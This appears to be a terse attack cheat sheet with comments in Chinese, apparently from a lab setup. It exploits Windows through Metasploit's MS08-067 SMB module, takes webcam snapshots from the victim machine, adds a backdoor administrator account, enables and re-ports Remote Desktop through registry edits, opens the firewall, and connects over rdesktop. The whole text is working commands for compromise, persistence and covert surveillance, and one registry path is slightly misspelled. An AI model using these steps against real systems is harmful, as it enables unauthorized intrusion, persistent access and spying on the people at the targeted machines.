msfconsole
    use exploit/windows/smb/ms08_067_netapi
    set lhost 192.168.88.130
    set rhost 192.168.88.139

    run

    ipconfig

    webcam_list
    webcam_snap

    net user lcy 2218 /add
    net localgroup administrators lcy /add  //把lcy加入管理员用户

    REG query HKLM\SYSTEM\CurrentControlSet\Controly\Terminal" "Server\WinStations\RDP-Tcp 
    /v PortNumber //查询终端端口
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections 
    /t REG_DWORD /d 00000000 /f //开启XP&2003终端服务
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp 
    /v PortNumber /t REG_DWORD /d 0x7d8 /f   //更改终端端口为2008(0x7d8)默认为3389（0xD3D）
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\

    Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 
    3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
    //取消xp&2003系统防火墙对终端服务的限制及IP连接的限制

    rdesktop -f -a 16 192.168.88.139:3389
    //在另一个终端开启远程桌面